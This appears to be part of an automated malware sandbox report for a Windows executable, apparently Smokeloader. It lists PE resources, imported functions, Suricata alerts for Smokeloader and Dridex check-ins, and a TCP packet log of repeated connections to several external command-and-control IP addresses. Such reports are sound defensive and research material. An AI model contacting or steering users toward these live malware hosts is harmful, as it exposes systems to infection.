RT_ICON	0x12b670	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Turkish	Turkey	0.17847091932457787
RT_ICON	0x12c718	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Turkish	Turkey	0.21147540983606558
RT_ICON	0x12d0a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Turkish	Turkey	0.23670212765957446
RT_STRING	0x130a28	0x404	data			0.4494163424124514
RT_STRING	0x130e30	0x568	data			0.4407514450867052
RT_STRING	0x131398	0x532	data			0.44511278195488724
RT_STRING	0x1318d0	0x7bc	data			0.4222222222222222
RT_STRING	0x132090	0x92a	data			0.4121909633418585
RT_STRING	0x1329c0	0x700	data			0.4291294642857143
RT_STRING	0x1330c0	0x524	data			0.45440729483282677
RT_STRING	0x1335e8	0x708	data			0.4272222222222222
RT_STRING	0x133cf0	0x75e	data			0.4236479321314952
RT_STRING	0x134450	0x730	data			0.4260869565217391
RT_STRING	0x134b80	0x842	data			0.4195837275307474
RT_STRING	0x1353c8	0x506	data			0.4432348367029549
RT_STRING	0x1358d0	0x9c	data			0.6025641025641025
RT_GROUP_CURSOR	0x130858	0x22	data			1.088235294117647
RT_GROUP_ICON	0x122a60	0x68	data	Turkish	Turkey	0.7019230769230769
RT_GROUP_ICON	0x12d508	0x76	data	Turkish	Turkey	0.6779661016949152
RT_GROUP_ICON	0x11d2d0	0x76	data	Turkish	Turkey	0.6610169491525424
RT_GROUP_ICON	0x126ce0	0x68	data	Turkish	Turkey	0.7211538461538461
RT_VERSION	0x130880	0x1a8	data			0.5825471698113207

Imports

DLL	Import
KERNEL32.dll	SetPriorityClass, GetNumaProcessorNode, OpenJobObjectA, ReadConsoleA, QueryDosDeviceA, GetEnvironmentStringsW, WaitForSingleObject, InterlockedCompareExchange, GetComputerNameW, GetNumaAvailableMemoryNode, BackupSeek, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, GlobalAlloc, GetVolumeInformationA, GetConsoleMode, GetConsoleAliasExesLengthW, GetSystemTimeAdjustment, WriteConsoleOutputA, HeapDestroy, GetFileAttributesA, GetBinaryTypeA, SearchPathW, GetStdHandle, GetLastError, GetProcAddress, MoveFileW, SearchPathA, LoadLibraryA, LocalAlloc, SetCalendarInfoW, SetCommMask, CreatePipe, GetDefaultCommConfigA, BuildCommDCBA, PurgeComm, FatalAppExitA, WriteConsoleOutputAttribute, FindAtomW, CopyFileExA, GetModuleFileNameW, GetCommandLineW, HeapFree, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapAlloc, VirtualAlloc, HeapReAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, Sleep, HeapSize, ExitProcess, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WriteFile, GetModuleFileNameA, FreeEnvironmentStringsW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA
USER32.dll	GetUserObjectInformationW, SetFocus
ADVAPI32.dll	ObjectPrivilegeAuditAlarmA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-30T15:37:52.397966+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49706	187.228.112.175	80	TCP
2024-09-30T15:37:53.550741+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49707	187.228.112.175	80	TCP
2024-09-30T15:37:54.522033+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49708	187.228.112.175	80	TCP
2024-09-30T15:37:55.560773+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49709	187.228.112.175	80	TCP
2024-09-30T15:37:56.721574+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49710	187.228.112.175	80	TCP
2024-09-30T15:37:57.725587+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49711	187.228.112.175	80	TCP
2024-09-30T15:37:58.851638+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49712	187.228.112.175	80	TCP
2024-09-30T15:37:59.878104+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49713	187.228.112.175	80	TCP
2024-09-30T15:38:00.864999+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49714	187.228.112.175	80	TCP
2024-09-30T15:38:01.850458+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49715	187.228.112.175	80	TCP
2024-09-30T15:38:03.027320+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49716	187.228.112.175	80	TCP
2024-09-30T15:38:03.993808+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49717	187.228.112.175	80	TCP
2024-09-30T15:38:04.972429+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49718	187.228.112.175	80	TCP
2024-09-30T15:38:05.963208+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49719	187.228.112.175	80	TCP
2024-09-30T15:38:06.991497+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49720	187.228.112.175	80	TCP
2024-09-30T15:38:07.970450+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49721	187.228.112.175	80	TCP
2024-09-30T15:38:08.937819+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49722	187.228.112.175	80	TCP
2024-09-30T15:38:09.905426+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49723	187.228.112.175	80	TCP
2024-09-30T15:38:10.885092+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49724	187.228.112.175	80	TCP
2024-09-30T15:38:11.851843+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49725	187.228.112.175	80	TCP
2024-09-30T15:38:17.653595+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49728	187.228.112.175	80	TCP
2024-09-30T15:38:18.643607+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49729	187.228.112.175	80	TCP
2024-09-30T15:38:19.631633+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49730	187.228.112.175	80	TCP
2024-09-30T15:38:21.247631+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49731	187.228.112.175	80	TCP
2024-09-30T15:38:22.219164+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49732	187.228.112.175	80	TCP
2024-09-30T15:38:23.194439+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49733	187.228.112.175	80	TCP
2024-09-30T15:38:24.808335+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49734	187.228.112.175	80	TCP
2024-09-30T15:38:26.006013+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49735	187.228.112.175	80	TCP
2024-09-30T15:38:26.988643+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49736	187.228.112.175	80	TCP
2024-09-30T15:38:27.988458+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49737	187.228.112.175	80	TCP
2024-09-30T15:38:44.499108+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49738	23.145.40.162	443	TCP
2024-09-30T15:38:44.836500+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.8	49738	23.145.40.162	443	TCP
2024-09-30T15:38:44.970431+0200	2829848	ETPRO MALWARE SmokeLoader encrypted module (3)	2	23.145.40.162	443	192.168.2.8	49738	TCP
2024-09-30T15:38:45.886177+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49739	23.145.40.162	443	TCP
2024-09-30T15:38:46.251562+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.8	49739	23.145.40.162	443	TCP
2024-09-30T15:38:46.894888+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49740	23.145.40.162	443	TCP
2024-09-30T15:38:47.176802+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.8	49740	23.145.40.162	443	TCP
2024-09-30T15:38:47.794779+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49741	23.145.40.162	443	TCP
2024-09-30T15:38:48.079552+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.8	49741	23.145.40.162	443	TCP
2024-09-30T15:38:48.830258+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49742	23.145.40.162	443	TCP
2024-09-30T15:38:49.104360+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.8	49742	23.145.40.162	443	TCP
2024-09-30T15:38:50.503370+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49743	23.145.40.162	443	TCP
2024-09-30T15:38:51.323680+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.8	49743	23.145.40.162	443	TCP
2024-09-30T15:38:52.011851+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49744	23.145.40.162	443	TCP
2024-09-30T15:38:52.294530+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.8	49744	23.145.40.162	443	TCP
2024-09-30T15:38:52.984161+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49745	23.145.40.162	443	TCP
2024-09-30T15:38:53.297588+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.8	49745	23.145.40.162	443	TCP
2024-09-30T15:38:53.912532+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49746	23.145.40.162	443	TCP
2024-09-30T15:38:54.205270+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.8	49746	23.145.40.162	443	TCP
2024-09-30T15:38:54.938562+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49747	23.145.40.162	443	TCP
2024-09-30T15:38:55.243276+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.8	49747	23.145.40.162	443	TCP
2024-09-30T15:38:56.246553+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49748	23.145.40.162	443	TCP
2024-09-30T15:38:56.520099+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.8	49748	23.145.40.162	443	TCP
2024-09-30T15:38:57.222508+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49749	23.145.40.162	443	TCP
2024-09-30T15:38:57.565466+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.8	49749	23.145.40.162	443	TCP
2024-09-30T15:39:03.093048+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49750	23.145.40.162	443	TCP
2024-09-30T15:39:03.458246+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.8	49750	23.145.40.162	443	TCP
2024-09-30T15:39:34.947698+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49751	187.228.112.175	80	TCP
2024-09-30T15:39:36.916354+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49752	187.228.112.175	80	TCP
2024-09-30T15:39:40.479139+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49753	187.228.112.175	80	TCP
2024-09-30T15:39:47.650001+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49754	187.228.112.175	80	TCP
2024-09-30T15:39:57.130255+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49755	187.228.112.175	80	TCP
2024-09-30T15:40:09.910486+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49756	187.228.112.175	80	TCP
2024-09-30T15:40:17.577744+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49757	23.145.40.162	443	TCP
2024-09-30T15:40:17.914963+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.8	49757	23.145.40.162	443	TCP
2024-09-30T15:40:24.269864+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49758	109.121.204.14	80	TCP
2024-09-30T15:40:37.644731+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49759	23.145.40.162	443	TCP
2024-09-30T15:40:38.006496+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.8	49759	23.145.40.162	443	TCP
2024-09-30T15:40:46.200997+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49760	109.121.204.14	80	TCP
2024-09-30T15:40:59.327335+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49761	23.145.40.162	443	TCP
2024-09-30T15:40:59.669661+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.8	49761	23.145.40.162	443	TCP
2024-09-30T15:41:09.207582+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49762	109.121.204.14	80	TCP
2024-09-30T15:41:22.625430+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.8	49763	23.145.40.162	443	TCP
2024-09-30T15:41:22.977909+0200	2809882	ETPRO MALWARE Dridex Post Checkin Activity 3	1	192.168.2.8	49763	23.145.40.162	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 15:37:51.351717949 CEST	49706	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:51.356601000 CEST	80	49706	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:51.359405041 CEST	49706	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:51.359580994 CEST	49706	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:51.359603882 CEST	49706	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:51.364371061 CEST	80	49706	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:51.364624977 CEST	80	49706	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:52.397855997 CEST	80	49706	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:52.397916079 CEST	80	49706	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:52.397948980 CEST	80	49706	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:52.397965908 CEST	49706	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:52.398004055 CEST	49706	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:52.399343967 CEST	49706	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:52.402858973 CEST	49707	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:52.404179096 CEST	80	49706	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:52.407969952 CEST	80	49707	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:52.408041954 CEST	49707	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:52.408180952 CEST	49707	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:52.408200026 CEST	49707	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:52.413156033 CEST	80	49707	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:52.413320065 CEST	80	49707	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:53.547043085 CEST	80	49707	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:53.547375917 CEST	80	49707	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:53.550740957 CEST	49707	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:53.550914049 CEST	49707	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:53.553389072 CEST	49708	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:53.555711031 CEST	80	49707	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:53.558393002 CEST	80	49708	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:53.558505058 CEST	49708	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:53.558628082 CEST	49708	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:53.558648109 CEST	49708	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:53.563489914 CEST	80	49708	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:53.563505888 CEST	80	49708	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:54.521413088 CEST	80	49708	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:54.521955967 CEST	80	49708	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:54.522032976 CEST	49708	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:54.526923895 CEST	49708	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:54.531761885 CEST	80	49708	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:54.576423883 CEST	49709	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:54.581444025 CEST	80	49709	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:54.581522942 CEST	49709	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:54.581722021 CEST	49709	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:54.581734896 CEST	49709	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:54.586617947 CEST	80	49709	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:54.586711884 CEST	80	49709	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:55.560359001 CEST	80	49709	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:55.560703039 CEST	80	49709	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:55.560772896 CEST	49709	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:55.572129011 CEST	49709	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:55.576958895 CEST	80	49709	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:55.579225063 CEST	49710	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:55.584027052 CEST	80	49710	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:55.584098101 CEST	49710	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:55.584212065 CEST	49710	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:55.584223986 CEST	49710	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:55.589071989 CEST	80	49710	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:55.589406967 CEST	80	49710	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:56.721446991 CEST	80	49710	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:56.721507072 CEST	80	49710	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:56.721574068 CEST	49710	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:56.721786976 CEST	49710	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:56.724490881 CEST	49711	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:56.726568937 CEST	80	49710	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:56.729343891 CEST	80	49711	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:56.729429007 CEST	49711	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:56.729541063 CEST	49711	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:56.729566097 CEST	49711	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:56.734430075 CEST	80	49711	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:56.734442949 CEST	80	49711	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:57.721139908 CEST	80	49711	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:57.725513935 CEST	80	49711	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:57.725586891 CEST	49711	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:57.832458019 CEST	49711	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:57.837399960 CEST	80	49711	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:57.883491993 CEST	49712	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:57.888514042 CEST	80	49712	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:57.888603926 CEST	49712	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:57.894596100 CEST	49712	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:57.894619942 CEST	49712	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:57.900058985 CEST	80	49712	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:57.900075912 CEST	80	49712	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:58.851171017 CEST	80	49712	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:58.851581097 CEST	80	49712	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:58.851638079 CEST	49712	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:58.851766109 CEST	49712	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:58.856523037 CEST	80	49712	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:58.869071960 CEST	49713	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:58.874005079 CEST	80	49713	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:58.874094009 CEST	49713	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:58.874209881 CEST	49713	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:58.874500036 CEST	49713	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:58.879098892 CEST	80	49713	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:58.879344940 CEST	80	49713	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:59.877990961 CEST	80	49713	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:59.878009081 CEST	80	49713	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:59.878103971 CEST	49713	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:59.878205061 CEST	49713	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:59.882618904 CEST	80	49713	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:59.882688046 CEST	49713	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:59.883120060 CEST	80	49713	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:59.901458025 CEST	49714	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:59.906328917 CEST	80	49714	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:59.906409979 CEST	49714	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:59.906555891 CEST	49714	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:59.906584024 CEST	49714	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:37:59.911731005 CEST	80	49714	187.228.112.175	192.168.2.8
Sep 30, 2024 15:37:59.911740065 CEST	80	49714	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:00.864689112 CEST	80	49714	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:00.864945889 CEST	80	49714	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:00.864999056 CEST	49714	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:00.867997885 CEST	49714	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:00.872905016 CEST	80	49714	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:00.885526896 CEST	49715	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:00.890613079 CEST	80	49715	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:00.890674114 CEST	49715	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:00.890818119 CEST	49715	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:00.890835047 CEST	49715	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:00.895693064 CEST	80	49715	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:00.896034002 CEST	80	49715	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:01.849919081 CEST	80	49715	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:01.850369930 CEST	80	49715	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:01.850457907 CEST	49715	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:01.850692987 CEST	49715	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:01.853343964 CEST	49716	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:01.855494976 CEST	80	49715	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:01.858223915 CEST	80	49716	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:01.858303070 CEST	49716	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:01.858439922 CEST	49716	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:01.858463049 CEST	49716	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:01.863218069 CEST	80	49716	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:01.863440037 CEST	80	49716	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:03.027226925 CEST	80	49716	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:03.027261972 CEST	80	49716	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:03.027319908 CEST	49716	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:03.027538061 CEST	49716	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:03.031450033 CEST	49717	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:03.032404900 CEST	80	49716	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:03.036362886 CEST	80	49717	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:03.036664009 CEST	49717	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:03.036783934 CEST	49717	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:03.036797047 CEST	49717	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:03.041613102 CEST	80	49717	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:03.041815996 CEST	80	49717	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:03.993493080 CEST	80	49717	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:03.993716002 CEST	80	49717	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:03.993808031 CEST	49717	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:03.993890047 CEST	49717	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:03.997689009 CEST	49718	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:03.999973059 CEST	80	49717	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:04.003247023 CEST	80	49718	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:04.003304005 CEST	49718	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:04.003530025 CEST	49718	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:04.003530025 CEST	49718	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:04.009027004 CEST	80	49718	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:04.009268999 CEST	80	49718	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:04.966228008 CEST	80	49718	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:04.970972061 CEST	80	49718	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:04.972429037 CEST	49718	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:04.975657940 CEST	49718	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:04.978451014 CEST	49719	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:04.980580091 CEST	80	49718	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:04.983278990 CEST	80	49719	187.228.112.175	192.168.2.8
Sep 30, 2024 15:38:04.983338118 CEST	49719	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:04.983519077 CEST	49719	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:04.983542919 CEST	49719	80	192.168.2.8	187.228.112.175
Sep 30, 2024 15:38:04.988816977 CEST	80	49719	187.228.112.175	192.168.2.8
